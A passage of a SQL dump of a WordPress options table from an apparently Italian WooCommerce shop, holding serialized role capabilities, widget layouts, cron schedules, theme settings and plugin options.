\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:19:\"manage_postman_smtp\";b:1;s:19:\"manage_postman_logs\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:9:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:8:\"customer\";a:2:{s:4:\"name\";s:7:\"Cliente\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:12:\"shop_manager\";a:2:{s:4:\"name\";s:15:\"Gestore Negozio\";s:12:\"capabilities\";a:108:{s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:17:\"edit_others_pages\";b:1;s:13:\"publish_posts\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_posts\";b:1;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:19:\"delete_others_pages\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:1;s:6:\"import\";b:1;s:10:\"list_users\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:38:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"view_site_health_checks\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(90,'WPLANG','it_IT','yes'),(91,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(92,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(93,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(96,'sidebars_widgets','a:26:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:5:{i:0;s:8:\"search-2\";i:1;s:12:\"categories-2\";i:2;s:23:\"mkdf_blog_list_widget-2\";i:3;s:23:\"mkdf_instagram_widget-3\";i:4;s:32:\"mkdf_social_icons_group_widget-5\";}s:19:\"footer_top_column_1\";a:0:{}s:19:\"footer_top_column_2\";a:0:{}s:19:\"footer_top_column_3\";a:0:{}s:19:\"footer_top_column_4\";a:0:{}s:22:\"footer_bottom_column_1\";a:3:{i:0;s:13:\"media_image-2\";i:1;s:6:\"text-2\";i:2;s:32:\"mkdf_social_icons_group_widget-4\";}s:22:\"footer_bottom_column_2\";a:0:{}s:22:\"footer_bottom_column_3\";a:0:{}s:8:\"sidearea\";a:3:{i:0;s:13:\"media_image-3\";i:1;s:6:\"text-5\";i:2;s:6:\"text-6\";}s:26:\"fullscreen_search_column_1\";a:0:{}s:26:\"fullscreen_search_column_2\";a:0:{}s:26:\"fullscreen_search_column_3\";a:0:{}s:27:\"mkdf-right-from-mobile-logo\";a:0:{}s:17:\"mkdf-sticky-right\";a:1:{i:0;s:23:\"mkdf_side_area_opener-5\";}s:17:\"mkdf-top-bar-left\";a:0:{}s:18:\"mkdf-top-bar-right\";a:0:{}s:12:\"shop-sidebar\";a:8:{i:0;s:23:\"mkdf_separator_widget-2\";i:1;s:28:\"woocommerce_product_search-2\";i:2;s:32:\"woocommerce_product_categories-2\";i:3;s:26:\"woocommerce_price_filter-2\";i:4;s:22:\"woocommerce_products-2\";i:5;s:23:\"mkdf_instagram_widget-2\";i:6;s:23:\"mkdf_separator_widget-4\";i:7;s:32:\"mkdf_social_icons_group_widget-3\";}s:19:\"shop-header-widgets\";a:2:{i:0;s:32:\"mkdf_woocommerce_dropdown_cart-2\";i:1;s:23:\"mkdf_side_area_opener-3\";}s:9:\"left-menu\";a:2:{i:0;s:23:\"mkdf_separator_widget-3\";i:1;s:6:\"text-3\";}s:13:\"custom-opener\";a:1:{i:0;s:23:\"mkdf_side_area_opener-4\";}s:15:\"logo-fullscreen\";a:1:{i:0;s:13:\"media_image-4\";}s:13:\"custom-sticky\";a:1:{i:0;s:32:\"mkdf_social_icons_group_widget-6\";}s:27:\"mkdf-header-widget-area-one\";a:1:{i:0;s:32:\"mkdf_social_icons_group_widget-2\";}s:27:\"mkdf-header-widget-area-two\";a:1:{i:0;s:23:\"mkdf_side_area_opener-2\";}s:13:\"array_version\";i:2;}','yes'),(98,'cron','a:35:{i:1618880095;a:1:{s:30:\"woocommerce_tracker_send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618881465;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1618883214;a:1:{s:32:\"woocommerce_cancel_unpaid_orders\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1618883504;a:1:{s:30:\"mwb_wgm_giftcard_cron_schedule\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1618883995;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1618884825;a:1:{s:33:\"wc_admin_process_orders_milestone\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1618884843;a:1:{s:29:\"wc_admin_unsnooze_admin_notes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1618890885;a:1:{s:24:\"woocommerce_cleanup_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618896471;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618897904;a:1:{s:19:\"mwb_wgm_update_json\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618897905;a:1:{s:19:\"mwb_wgm_check_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618900393;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618901685;a:1:{s:28:\"woocommerce_cleanup_sessions\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1618903902;a:1:{s:23:\"updraft_backup_database\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618904685;a:1:{s:58:\"check_plugin_updates-nm-woocommerce-checkout-field-manager\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1618910110;a:1:{s:23:\"sb_instagram_twicedaily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1618910486;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618911183;a:1:{s:14:\"wc_admin_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618921348;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1618921365;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618922910;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618925669;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618927643;a:2:{s:35:\"mwb_wgm_giftcard_cron_delete_images\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:19:\"mwb_wgm_check_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618947885;a:1:{s:29:\"setup_styles_and_scripts_cofm\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618953802;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618959600;a:1:{s:27:\"woocommerce_scheduled_sales\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618963289;a:2:{s:31:\"wpseo_permalink_structure_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:20:\"wpseo_home_url_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618963300;a:1:{s:13:\"wpseo-reindex\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618966495;a:1:{s:33:\"woocommerce_cleanup_personal_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1618990302;a:1:{s:14:\"updraft_backup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1619129842;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1619365417;a:1:{s:23:\"sbi_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1619398545;a:1:{s:25:\"woocommerce_geoip_updater\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:11:\"fifteendays\";s:4:\"args\";a:0:{}s:8:\"interval\";i:1296000;}}}i:1619424000;a:1:{s:29:\"sb_instagram_feed_issue_email\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"sbiweekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(109,'_transient_random_seed','fba3906cacff6d9604e164f80297b7e0','yes'),(135,'recently_activated','a:2:{s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:1611848486;s:31:\"wp-serverinfo/wp-serverinfo.php\";i:1611848486;}','yes'),(140,'ead_width','100%','yes'),(141,'ead_height','500px','yes'),(142,'ead_download','none','yes'),(143,'ead_provider','google','yes'),(144,'ead_mediainsert','1','yes'),(146,'theme_mods_twentyfifteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1438174121;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(147,'current_theme','Attika','yes'),(148,'theme_mods_twentythirteen','a:4:{i:0;b:0;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1544816347;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:14:\"recent-posts-2\";i:1;s:6:\"text-3\";i:2;s:6:\"text-7\";i:3;s:6:\"text-5\";i:4;s:6:\"text-4\";i:5;s:6:\"text-6\";}s:9:\"sidebar-2\";a:1:{i:0;s:6:\"text-2\";}}}s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:18:\"custom_css_post_id\";i:-1;}','yes'),(149,'theme_switched','','yes'),(156,'theme_mods_bistro','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1438195826;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:1:{i:0;s:20:\"sib_subscribe_form-2\";}s:8:\"footer-1\";a:1:{i:0;s:21:\"sydney_contact_info-2\";}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}}}}','yes'),(157,'siteorigin_panels_initial_version','2.1.4','no'),(159,'siteorigin_panels_settings','a:0:{}','yes'),(160,'wpcf-version','2.2.9','yes'),(161,'wp_installer_settings','eJzs/ftuI0mWJwz+PQnkOzjY0yVFl0iR1F156VUqIrJUHZGpCikqunYwYLlIl+gZJJ3lToZC2UigHuMbYD5g/tyXWCwwj1IvsK+wdm5mx9zMSUqZUZ2909+lK0N0NzM3O3bu53fS073Tf6tOe/3TVpnNiypfFGWeVa0v0tM+/LB/2